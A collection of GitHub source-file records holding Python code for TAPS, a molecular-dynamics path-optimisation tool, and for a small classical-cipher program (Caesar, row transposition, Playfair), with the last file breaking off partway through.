"text": "__author__ = 'Lizhe Zhu'\n\nimport numpy as np\n\nclass PcvInd(object):\n\t\"\"\"\n\tattributes:\n\tatomInd numpy.int: combined set of input align & input rms: (atomIndex in PDB, atomInd-1=index in TAPS)\n\talign numpy.int: which atoms in atomInd to align trajectory: for MDTraj\n\trms numpy.int: which atoms in atomInd to compute RMSD : for MDTraj\n\talignPLU numpy.float: output numpy array, if used to align: for Plumed\n\trmsPLU numpy.float: output numpy array, if used to compute rmsd: for Plumed\n\t\"\"\"\n\tdef __init__(self, align = None, rms = None):\t\t\n\t\t\"\"\"\n\t\t:param align: index for alignment, numpy array (1,x)\n\t\t:param rms: index for RMSD computation numpy array (1,x)\n\t\t\"\"\"\n\t\tif (align is None) or (rms is None):\n\t\t\tself.atomInd, self.align, self.rms, self.atomSlice, self.alignPLU, self.rmsPLU = None, None, None, None, None, None\n\t\telse:\n\t\t\ta=align.astype(int)\n\t\t\tr=rms.astype(int)\n\t\t\tself.atomInd = np.unique(np.append(a, r))\t\n\t\t\tself.atomSlice = np.subtract(self.atomInd,1)\t\n\t\t\tself.align, self.rms = np.zeros(len(align),dtype=np.int), np.zeros(len(rms),dtype=np.int)\n\t\t\ttmp = len(self.atomInd)\n\t\t\tself.alignPLU, self.rmsPLU = np.zeros(tmp), np.zeros(tmp)\n\t\t\tfor ia in range(len(align)):\n\t\t\t\tid = np.where(self.atomInd == align[ia])[0]\t\t\n\t\t\t\tself.align[ia] = id \t\n\t\t\t\tself.alignPLU[id] = 1.00\t\n\t\t\tfor ir in range(len(rms)):\t\n\t\t\t\tid = np.where(self.atomInd == rms[ir])[0]\n\t\t\t\tself.rms[ir] = id\n\t\t\t\tself.rmsPLU[id] = 1.00\t\n\n"
},
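A worked example of the index bookkeeping PcvInd performs, using small made-up 1-based atom selections:

```python
# PcvInd maps 1-based PDB atom indices to 0-based mdtraj indices and to
# plumed ALIGN/RMSD weight columns. The align/rms selections are illustrative.
import numpy as np
from PcvInd import PcvInd

p = PcvInd(align=np.array([1, 2, 3]), rms=np.array([2, 3, 4]))
print(p.atomInd)    # [1 2 3 4]      union of align and rms (1-based)
print(p.atomSlice)  # [0 1 2 3]      the same, shifted by -1 for mdtraj
print(p.align)      # [0 1 2]        positions of the align atoms within atomInd
print(p.rms)        # [1 2 3]        positions of the rms atoms within atomInd
print(p.alignPLU)   # [1. 1. 1. 0.]  plumed alignment weight column
print(p.rmsPLU)     # [0. 1. 1. 1.]  plumed RMSD weight column
```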
{
"alpha_fraction": 0.5840572118759155,
"alphanum_fraction": 0.5862715244293213,
"avg_line_length": 36.39490509033203,
"blob_id": "2adaa47c7571369d2dade82b34eb4b1b315cbde2",
"content_id": "d1043d3f2069fe85b534c38e1163e83626335127",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5871,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 157,
"path": "/Confs.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, division\nimport mdtraj as md\nimport numpy as np\nimport PluPDB as plu\nfrom mdtraj.utils import in_units_of\nfrom copy import deepcopy\n\nclass Confs(md.Trajectory): # inherit class Trajectory in mdtraj\n\t\"\"\"Container object for a molecular dynamics conformations, built upon Class Trajectory from MDTraj\n\n\t# ==============\n\tChild Attributes\n\t# ==============\n\tgc : int [the index for the geometrically central confomration within this trajectory]\n\n\t# ==============\n\tChild Method\n\t# ==============\n\tatom_slice() overrides parent class mdtraj.Trajectory\n\tsave_plu2()\n\t\"\"\"\n\t@property\n\tdef gc(self):\n\t\t\"\"\"\n\t\tThe index of geometric central conformation in the this Trajectory\n\t\t:return:\n\t\tgc : int\n\t\tThe index of geometric central conformation in the this Trajectory\n\t\t\"\"\"\n\t\treturn self._gc\n\n\[email protected]\n\tdef gc(self, value):\n\t\t\"\"\"\n\t\tThe index of geometric central conformation in the this Trajectory\n\t\t:return:\n\t\tgc : int\n\t\t\tThe index of geometric central conformation in the this Trajectory\n\t\t\"\"\"\n\t\tself._gc = value\n\n\tdef __init__(self, xyz, topology, gc=None, time=None, unitcell_lengths=None, unitcell_angles=None):\n\n\t\t# call constructor of parent class md.Trajectory\n\t\t\"\"\"\n\t\t:rtype: Confs\n\t\t\"\"\"\n\t\tsuper(Confs,self).__init__(xyz, topology, time, unitcell_lengths, unitcell_angles)\n\t\t#md.Trajectory.__init__(self, xyz, topology, time, unitcell_lengths, unitcell_angles) # equal to last line\n\n\t\t# geometric center has no default\n\t\tself._gc = gc\n\n\t# ==================================================================================================================\n\t# convert a mdtraj.Trajectory object into Confs to enable TAPS-relevant functions\n\t# ==================================================================================================================\n\t@classmethod\n\tdef traj2conf(self,trj):\t#Finished#\n\t\ttmp=Confs(trj.xyz,trj.topology,None)\n\t\ttmp.__dict__=trj.__dict__\n\t\ttmp.gc=None\n\t\treturn tmp\n\n\t# ==================================================================================================================\n\t# merges a few confs/mdtraj.trajectories into one, regardless of how many frames are in each Conf\n\t# ==================================================================================================================\n\t@classmethod\n\tdef merge(self, listConfs):\n\t\tnlist = len(listConfs) \n\t\tif nlist>0:\n\t\t\ttot = 0\n\t\t\tmerged = deepcopy(listConfs[0])\n\t\t\t#merged = listConfs[0], # only differ from deepcopy by 1 sec\n\t\t\tfor i in range(nlist):\n\t\t\t\tn = listConfs[i].n_frames\n\t\t\t\tlistConfs[i].time =list(range(tot, tot + n))\n\t\t\t\tif i > 0:\n\t\t\t\t\tmerged=merged.join(listConfs[i])\n\t\t\t\ttot += n\n\t\t\treturn merged\n\t\telse:\n\t\t\treturn None\n\n\t# ==================================================================================================================\n\t# find the geometric centroid of a Confs object containing multiple conformations, return the gc as one-frame Confs\n\t# ==================================================================================================================\n\tdef geoCentroid(self, pcvInd=None, doPBC=False):\n\t\t\"\"\"\n\t\tfind the geometric central conformation and extract it into a new Confs instance\n\t\tand update the index into\n\n\t\tpcvInd\n\n\t\t:return:\n\t\tgcc : Confs\n\t\t\"\"\"\n\t\tif pcvInd is 
None:\n\t\t\traise ValueError(\"Atoms for defining PathCV not given\")\n\n\t\telse:\n\t\t\tif self.n_frames > 1:\n\t\t\t\tif doPBC:\n\t\t\t\t\tself.image_molecules(True)\n\t\t\t\tpluAtoms = self.atom_slice(pcvInd.atomSlice)\n\t\t\t\t# numpy array to store rowsum\n\t\t\t\trowSum = np.zeros((self.n_frames, 1))\n\t\t\t\tfor frame in range(0, self.n_frames):\n\t\t\t\t\t# align frames using alignIndex\n\t\t\t\t\tpluAtoms.superpose(pluAtoms,frame,pcvInd.align)\n\t\t\t\t\t# compute RMSD\n\t\t\t\t\tval = md.rmsd(pluAtoms, pluAtoms, frame, pcvInd.rms)\n\t\t\t\t\trowSum[frame] = np.sum(val)\n\t\t\t\t# store index of the geometrically central frame in self._gc\n\t\t\t\tself._gc = np.argmin(rowSum)\n\t\t\t\t# extract the central frame\n\t\t\t\tgcc = self.slice(self._gc)\n\t\t\telse:\n\t\t\t\tgcc = deepcopy(self)\n\t\t\treturn gcc\n\n\t# ==================================================================================================================\n\t# Export the atoms defining PCV as a PDB file in plumed format\n\t# ==================================================================================================================\n\tdef save_plu2(self, filename, pcvInd=None, force_overwrite=True):\n\t\t\"\"\"Save trajectory to plumed PDB format\n\t\tParameters\n\t\t----------\n\t\tfilename : str\n\t\t\tfilesystem path in which to save the trajectory\n\t\tforce_overwrite : bool, default=True\n\t\t\tOverwrite anything that exists at filename, if it's already there\n\t\tpcvInd : PcvInd\n\t\t\tatom indices and align/rms weights defining the PCV\n\t\t\"\"\"\n\t\tself._check_valid_unitcell()\n\n\t\tif pcvInd is None:\n\t\t\traise ValueError(\"Atoms for defining PCV not given\")\n\n\t\t#subtract the plumed atoms from original trajectory\n\t\tpluAtoms=self.atom_slice(pcvInd.atomSlice)\n\n\t\tif len(pcvInd.atomInd) != pluAtoms.n_atoms:\n\t\t\traise ValueError(\"number of atom index %s should equal n_atoms %s\" % (str(len(pcvInd.atomInd)), str(pluAtoms.n_atoms)))\n\t\tif len(pcvInd.alignPLU) != pluAtoms.n_atoms:\n\t\t\traise ValueError(\"number of atoms to align %s should equal n_atoms %s\" % (str(len(pcvInd.alignPLU)), str(pluAtoms.n_atoms)))\n\t\tif len(pcvInd.rmsPLU) != pluAtoms.n_atoms:\n\t\t\traise ValueError(\"number of atoms for rmsd %s should equal n_atoms %s\" % (str(len(pcvInd.rmsPLU)), str(pluAtoms.n_atoms)))\n\n\t\twith plu.PluPDBfile(filename, 'w', force_overwrite=force_overwrite) as f:\n\t\t\tfor i in range(pluAtoms.n_frames):\n\t\t\t\tf.write(in_units_of(pluAtoms._xyz[i], Confs._distance_unit, f.distance_unit),\n\t\t\t\t\tpluAtoms.topology,\n\t\t\t\t\tframe_ind=(i+1),\n\t\t\t\t\tpcv_ind=pcvInd)\n"
},
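`geoCentroid` above picks the medoid frame: the conformation whose summed RMSD to all other frames is minimal. The selection logic in isolation, with a random symmetric matrix standing in for the pairwise RMSDs that mdtraj would compute:

```python
# Medoid ('geometric centroid') selection as in Confs.geoCentroid; the random
# symmetric matrix below is an illustrative stand-in for pairwise RMSD values.
import numpy as np

rng = np.random.default_rng(0)
d = rng.random((5, 5))
d = (d + d.T) / 2.0
np.fill_diagonal(d, 0.0)          # self-RMSD is zero

row_sum = d.sum(axis=1)           # rowSum[frame] in geoCentroid
gc = int(np.argmin(row_sum))      # the index geoCentroid stores in self._gc
print("medoid frame:", gc)
```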
{
"alpha_fraction": 0.4187391698360443,
"alphanum_fraction": 0.42452284693717957,
"avg_line_length": 37.125,
"blob_id": "12a0f0d33239cf1cce63a31a463222cf4aa1f821",
"content_id": "aae2428392e1d4a950b16d3ddb38d9e19f05885b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5187,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 136,
"path": "/runTAPS.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, division\n# =======================================================================================================================\n# import mpi4py for parallel computing\n# =======================================================================================================================\n#import mpi4py package #\n\n# ======================================================================================================================\n# digits formater for iterations: \"3 --> 03\"\n# ======================================================================================================================\ndef digits(s1):\n\ts2 = \"%.3d\" % s1\n\treturn s2\n\nfrom TAPS import *\n#from Confs import Confs\nimport time\nimport errno\nimport copy\nimport os\nfrom copy import deepcopy\n# =========================================================================================================\n# multiple independent taps\n# =========================================================================================================\nn_start = 0\nn_taps = 1\n\n# =========================================================================================================\n# number of iterations per taps\n# =========================================================================================================\nn_iter = 10\niter_start = 0\n\n# =========================================================================================================\n# input files\n# =========================================================================================================\ndirPars = 'pars' # dirPar\nparFile = 'taps.par' # parameters filename\ntopFile = 'protein.pdb' # topology filename\np0File = 'path' + str(iter_start) + '.xtc' # initial path file\nalignFile = 'align.ndx' # atom index file for alignment\nrmsFile = 'rms.ndx' # atom index file for rmsd computation\nndxFile = 'index.ndx'\n\nfor i in range(n_start,n_taps+n_start):\n\ttapsName = 'PathInd' + str(i)\n\t#print(\"+++DEBUG+++ Barrier before iteration\")\n\tcomm.Barrier()\n\n\tif rank == main_rank and not os.path.exists(tapsName):\n\t\ttry:\n\t\t\tos.makedirs(tapsName)\n\t\texcept OSError as error:\n\t\t\tif error.errno != errno.EEXIST:\n\t\t\t\traise #Here, just make directory for saving calculation data#\n\telse:\n\t time.sleep(5)\n\n\tif rank == main_rank:\n\n\t\tprint(tapsName, \":\")\n\t\tprint(\"+++TAPS+++ Reading input parameters\") \n\n\t\tt0 = time.time()\n\t\t#print(\"+++DEBUG+++ Size:\", size, \"Rank:\", rank, \"running TAPS\")\n\n\t\ttaps = TAPS(dirPars, parFile, topFile, p0File, alignFile, rmsFile, ndxFile)\t#Create file system and read parameters#\n\n\t\tte = time.time()\n\t\tprint(\"+++TAPS+++ Reading finished (time-cost:\", te - t0, 'sec)')\n\t\tpathList = []\n\n\t\trefPath = copy.copy(taps.refPath)\t#Initialize parameters and conformation for taps run#\n\t\tpathList.append(refPath)\n\t\tdirEvol = tapsName + '/paths'\n\t\tif not os.path.exists(dirEvol):\n\t\t\tos.makedirs(dirEvol)\n\t\trefPath.pathName = 'iter' + digits(iter_start)\n\t\trefPath.exportPath(dirEvol)\n\telse:\n\t\ttaps = None\n\t\trefPath = None\n\n\t#mpi4py barrier#\n\n\ttaps = comm.bcast(taps, root=main_rank)\n\trefPath = comm.bcast(refPath, root=main_rank)\n\n\t#mpi4py barrier#\n\n\tfor j in range(iter_start, iter_start + n_iter):\n\t\t# ==================================================================================================\n\t\t# iteration index\n\t\t# 
==================================================================================================\n\t\titr = 'iter' + digits(j+1)\n\t\t# ==================================================================================================\n\t\t# one taps iteration\n\t\t# ==================================================================================================\n\t\tdirMeta = tapsName + '/sampling/' + itr\t\t\n\n\t\tif rank == 0:\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Preparing perpendicular sampling\")\n\t\t\tdirRUNs = taps.meta_dirs(refPath, dirMeta)\t#Create working directories#\n\t\t\tti = time.time()\n\t\t\ttaps.meta_setup(refPath, dirMeta, dirRUNs) \n\t\t\tte = time.time()\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Sampling preparation finished (time-cost: \", te - ti, 'sec)')\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Start perpendicular sampling\")\n\t\telse:\n\t\t\tdirRUNs = None\n\n\t\t#mpi4py barrier#\n\t\tdirRUNs = comm.bcast(dirRUNs, root=main_rank)\n\t\t#mpi4py barrier#\n\t\ttaps.meta_sample(dirMeta, dirRUNs)\n\t\t#mpi4py barrier#\n\t\t\n\t\tif rank == main_rank:\n\t\t\ttf = time.time()\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Perpendicular sampling finished (time-cost: \", tf - te, 'sec)')\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Analyzing data to update path\")\n\t\t\t\n\t\tp_meta = taps.meta_analyze(dirMeta, dirRUNs)\n\n\t\tif rank == main_rank:\n\t\t\ttg = time.time()\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Analysis finished (time-cost: \", tg - tf, 'sec)')\n\t\t\tp_meta.pathName = itr\n\t\t\tp_meta.exportPath(dirEvol)\n\t\t\tprint(' ')\n\t\t\trefPath = deepcopy(p_meta)\n\n\tif rank== 0:\n\t\tprint('Path Optimization finished.')\n\t#mpi4py barrier#\n\n#mpi4py finalize# \n"
}
],
"num_files": 7
},
{
"repo_name": "PaulgSmith/Crypto",
"repo_url": "https://github.com/PaulgSmith/Crypto",
"snapshot_id": "767f7880d53b727b5dfe8dd023f6a4c828522a69",
"revision_id": "6bbbf72816bcd98d11adf9149870f55883586842",
"directory_id": "642a886b60c5792920c76e20b4cbf228937d73ed",
"branch_name": "refs/heads/master",
"visit_date": "2019-03-20T16:30:39.050577",
"revision_date": "2018-04-11T19:01:56",
"committer_date": "2018-04-11T19:01:56",
"github_id": 123982057,
"star_events_count": 0,
"fork_events_count": 0,
"gha_license_id": null,
"gha_created_at": null,
"gha_updated_at": null,
"gha_pushed_at": null,
"gha_language": null,
"files": [
{
"alpha_fraction": 0.5795741677284241,
"alphanum_fraction": 0.5821003317832947,
"avg_line_length": 40.43939208984375,
"blob_id": "a3d153a4c0f6058e38ff50a4a639234daa70bb1f",
"content_id": "db263dd111f939e5d70cf100ccf5ae8c775a301b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2771,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 66,
"path": "/cipher.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nimport argparse\nfrom ceasar import ceasar\nfrom rowtrans import rt\nfrom playfair import plf\nfrom rail import rl\nfrom vigenere import vig\nimport os\n\n\nparser = argparse.ArgumentParser(description=\"Cipher is a program that reads the input file, encrypts the file contents using the specified key\"\n \" and cipher, and writes the encypted/decrypted contents to the specific file\")\n\n\nparser.add_argument(\"cipher_name\", choices=['plf','rts','rfc', 'vig', 'ces','PLF','RTS','RFC', 'VIG', 'CES'],\n help='List of valid cipher options')\n \nparser.add_argument(\"key\", help=\"The encryption key to use\")\nparser.add_argument(\"enc_dec\", choices=['enc','dec','DEC','ENC'],\n help=\"Whether to encrypt or decrypt, respectively\")\n \nparser.add_argument(\"inputfile\", help=\"The file from which to read the input\")\nparser.add_argument(\"outputfile\", help=\"The file to which the output shall be written\")\nargs = parser.parse_args()\n\nfilepath = args.inputfile\noutput = args.outputfile\nif not os.path.isfile(filepath):\n print(\"File path {} does not exist. Exiting...\".format(filepath))\nif True:\n if True:\n with open(filepath, 'r') as file:\n input_text = file.read().replace('\\n', '').replace(' ', '')\n input_text = input_text.lower()\n file.close()\n\n if args.cipher_name == 'ces' or args.cipher_name == 'CES':\n cipher = ceasar(args.key, input_text)\n elif args.cipher_name == 'rts' or args.cipher_name == 'RTS':\n cipher = rt(args.key, input_text)\n elif args.cipher_name == 'plf' or args.cipher_name == 'PLF':\n cipher = plf(args.key, input_text)\n elif args.cipher_name == 'rfc' or args.cipher_name == 'RFC':\n cipher = rl(args.key, input_text)\n elif args.cipher_name == 'vig' or args.cipher_name == 'VIG':\n cipher = vig(args.key, input_text)\n \n if cipher.bool_set_key():\n file = open(output, 'w')\n if args.enc_dec == 'enc' or args.enc_dec == 'ENC':\n file.write(cipher.encrypt())\n elif args.enc_dec == 'dec' or args.enc_dec == 'DEC':\n file.write(cipher.decrypt())\n else:\n print(\"The ENC/DEC {} is in the wrong format. Please check and try again.\".format(args.key))\n else:\n print(\"The key {} is in the wrong format. Please check and try again.\".format(args.key))\n \n\nelse:\n print(\"File path {} does not exist. Exiting...\".format(output))\n \n\n \n \n \n \n \n \n"
},
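From the argparse definition above, a typical invocation would be `python cipher.py ces 3 enc plain.txt secret.txt` (file names illustrative). The same wiring can be exercised directly from Python; the key `'3'` and message below are example values:

```python
# Round trip through the ceasar class exactly as cipher.py constructs it.
from ceasar import ceasar

c = ceasar('3', 'attack')          # cipher_interface.__init__(key, text)
assert c.bool_set_key()            # key must be a positive integer string
ct = c.encrypt()
print(ct)                          # -> 'dwwdfn'
print(ceasar('3', ct).decrypt())   # -> 'attack'
```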
{
"alpha_fraction": 0.5994436740875244,
"alphanum_fraction": 0.6091794371604919,
"avg_line_length": 31.68181800842285,
"blob_id": "67825708035d6ab2f48877019d2c17a01f6bf245",
"content_id": "20e26ca00325b14a9a4bd4ffc1b8d0a02bc18ff8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 22,
"path": "/cipher_interface.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nclass cipher_interface(object):\n \"\"\"<CIPHER NAME> <KEY> <ENC/DEC> <INPUTFILE> <OUTPUT FILE>\"\"\"\n def __init__(self, key, text):\n self.key = key\n self.text = text\n \n \"\"\"\"Sets the key to use for encryption/decryption.\"\"\"\n def bool_set_Key(self, key):\n return False\n \"\"\"encrypts a string of plaintext and returns the cipher text string.\"\"\"\n def string_encrypt(self, plaintext): \n return \"\"\n \n \"\"\"decrypts a string of ciphertext and returns the decrypted plaintext.\"\"\"\n def string_decrypt(self, ciphertext):\n return \"\"\n"
},
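A minimal, hypothetical subclass illustrating the contract that the concrete ciphers in this repository implement (each overrides the same three methods):

```python
# Hypothetical no-op cipher demonstrating the cipher_interface contract.
from cipher_interface import cipher_interface

class identity(cipher_interface):
    def bool_set_key(self):
        return True            # accept any key
    def encrypt(self):
        return self.text       # no transformation
    def decrypt(self):
        return self.text

print(identity('anykey', 'hello').encrypt())  # -> 'hello'
```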
{
"alpha_fraction": 0.4811059832572937,
"alphanum_fraction": 0.4921658933162689,
"avg_line_length": 32.98387145996094,
"blob_id": "17277ae70734d58a9f187c281e23789cddf82da5",
"content_id": "1ad29c355d179489772fd96d8dfcc5706be8abd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2170,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 62,
"path": "/rowtrans.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Row Transposition Cipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\nimport math\n\nclass rt(cipher_interface):\n \n def bool_set_key(self):\n key = list(self.key)\n if self.key.isdigit():\n num = 1\n int_key = list(map(int, key))\n for x in range(0, len(self.key)):\n if num in int_key:\n num = num + 1\n else:\n return False\n return True\n else:\n return False\n\n def encrypt(self):\n plaintext = list(self.text)\n key = list(self.key)\n results = list()\n rows = math.ceil(len(plaintext) / len(key))\n extra_letters = (rows * len(key)) - len(plaintext)\n results = list()\n for x in range(0, int(extra_letters)):\n plaintext.append(chr(122 - (extra_letters-1 - x)))\n for x in range(0, len(key)):\n column = int(key[x]) -1\n tmp_list = list()\n for y in range (0, int(rows)):\n next_letter = plaintext[column + (len(key) * y)]\n tmp_list.append(next_letter)\n results.extend(tmp_list)\n results_format = ''.join(results)\n return results_format\n \n def decrypt(self):\n ciphertext = list(self.text)\n key = list(self.key)\n rows = math.ceil(len(ciphertext) / len(key))\n ordered_cipher = [0] * len(ciphertext)\n int_key = list(map(int, key))\n for x in range (0, len(key)):\n tmp = int_key.index(x+1)\n tmp = tmp \n for y in range (0, int(rows)):\n ordered_cipher[(int(rows) * x) + y] = ciphertext[tmp * int(rows) + y]\n plaintext = ['a'] * len(ordered_cipher)\n for x in range (0, int(rows)):\n for y in range (0, len(key)):\n plaintext[(len(key) * x) + y] = ordered_cipher[x + y * int(rows) ]\n results = ''.join(plaintext)\n return results\n \n \n \n \n \n \n \n"
},
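A quick round-trip check of rt (hypothetical inputs): with key '3142' the twelve letters form three rows of four, and the columns are read out in key order 3, 1, 4, 2:

```python
from rowtrans import rt

ct = rt('3142', 'attackatdawn').encrypt()
print(ct)                                         # tawacdatntka
assert rt('3142', ct).decrypt() == 'attackatdawn'
```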
{
"alpha_fraction": 0.37491878867149353,
"alphanum_fraction": 0.4035087823867798,
"avg_line_length": 26,
"blob_id": "12c72a92462999ccd3380b4fed9e1fab556b1ab3",
"content_id": "1e16204176a954c8c44915de532c585b50948bb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1539,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 57,
"path": "/ceasar.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Ceasar cypher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass ceasar(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isdigit() and int(self.key) > 0:\n return True\n else:\n return False\n\n def encrypt(self):\n tmp = list(self.text)\n i = 0\n for x in tmp:\n if ord(tmp[i]) != 32:\n ascii = (ord(tmp[i]) + int(self.key)) % 123\n if ascii < 97:\n ascii += 97\n tmp[i] = chr(ascii)\n i += 1\n results = ''.join(tmp)\n return results\n \n def decrypt(self):\n tmp = list(self.text)\n i = 0\n for x in tmp:\n if ord(tmp[i]) != 32:\n ascii = (ord(tmp[i]) - int(self.key)) % 123\n if ascii < 97:\n ascii += 26\n tmp[i] = chr(ascii)\n i += 1\n results = ''.join(tmp)\n return results\n \n \"\"\"def brute():\n k = 1\n for k in range(26):\n tmp = list()\n i = 0\n for x in tmp:\n if ord(tmp[i]) != 32:\n ascii = (ord(tmp[i]) - k) % 123\n if ascii < 97:\n ascii += 26\n tmp[i] = chr(ascii)\n i += 1\n results = ''.join(tmp)\n print(results)\"\"\"\n"
},
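A quick sanity check of ceasar (hypothetical inputs): shifting by k and then decrypting by the same k is the identity, and the per-letter arithmetic reduces to (c - 'a' + k) mod 26:

```python
from ceasar import ceasar

ct = ceasar('3', 'attackatdawn').encrypt()
print(ct)                                        # dwwdfndwgdzq
assert ceasar('3', ct).decrypt() == 'attackatdawn'
```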
{
"alpha_fraction": 0.4350844919681549,
"alphanum_fraction": 0.4494956135749817,
"avg_line_length": 40.89011001586914,
"blob_id": "635bc11a6a807584dd37149514711df6782dc72a",
"content_id": "ed23e578848aac48e490dcc204a1bdfd3eb51f79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7633,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 182,
"path": "/playfair.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Playfair Cipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass plf(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isalpha():\n return True\n else:\n return False\n \n def encrypt(self):\n fivexfive_key = [0] * 25\n key = list(self.key)\n tmp = 0\n plaintext = list(self.text)\n i_or_j = False\n for x in range (0, len(key)):\n if key[x] not in fivexfive_key:\n if key[x] != 'i' and key[x] != 'j':\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n elif not i_or_j:\n if key[x] == 'i' and 'j' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n elif key[x] == 'j' and 'i' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n ascii = 97\n for x in range (0, 26):\n if chr(ascii) not in fivexfive_key:\n if chr(ascii) != 'i' and chr(ascii) != 'j':\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n else:\n if not i_or_j:\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n i_or_j = True\n ascii = ascii + 1\n \n for x in range(0, len(plaintext) -1, 2):\n if (plaintext[x] == plaintext[x+1]):\n plaintext.insert(x+1, 'x')\n if len(plaintext) % 2 != 0:\n plaintext.append('x')\n \n ciphertext = list()\n ciphertext = [0] * len(plaintext)\n for x in range(0, len(plaintext), 2):\n first = plaintext[x]\n second = plaintext[x+1]\n first_location = int(fivexfive_key.index(first))\n second_location = int(fivexfive_key.index(second))\n first_row = int(first_location / 5)\n second_row = int(second_location / 5)\n first_colmn = fivexfive_key.index(first) % 5\n second_colmn = fivexfive_key.index(second) % 5\n if first_row == second_row:\n first_colmn = first_colmn + 1\n second_colmn = second_colmn + 1\n \n if (first_colmn != 5):\n ciphertext[x] = fivexfive_key[first_location + 1]\n else:\n ciphertext[x] = fivexfive_key[first_location - 4]\n \n if (second_colmn != 5):\n ciphertext[x+1] = fivexfive_key[second_location + 1]\n else:\n ciphertext[x+1] = fivexfive_key[second_location - 4]\n elif first_colmn == second_colmn:\n first_row = first_row + 1\n second_row = second_row + 1\n \n if (first_row != 5):\n ciphertext[x] = fivexfive_key[first_location + 5]\n else:\n ciphertext[x] = fivexfive_key[first_location - 20]\n \n if (second_row != 5):\n ciphertext[x+1] = fivexfive_key[second_location + 5]\n else:\n ciphertext[x+1] = fivexfive_key[second_location - 20]\n \n elif first_colmn > second_colmn:\n ciphertext[x] = fivexfive_key[first_location - (first_colmn - second_colmn)]\n ciphertext[x + 1] = fivexfive_key[second_location + (first_colmn - second_colmn)]\n elif first_colmn < second_colmn:\n ciphertext[x] = fivexfive_key[first_location + (second_colmn - first_colmn)]\n ciphertext[x + 1] = fivexfive_key[second_location - (second_colmn - first_colmn)]\n results = ''.join(ciphertext)\n return results\n \n def decrypt(self): \n fivexfive_key = [0] * 25\n key = list(self.key)\n tmp = 0\n ciphertext = list(self.text)\n i_or_j = False\n for x in range (0, len(key)):\n if key[x] not in fivexfive_key:\n if key[x] != 'i' and key[x] != 'j':\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n elif not i_or_j:\n if key[x] == 'i' and 'j' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n elif key[x] == 'j' and 'i' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n ascii = 97\n for x in range (0, 26):\n 
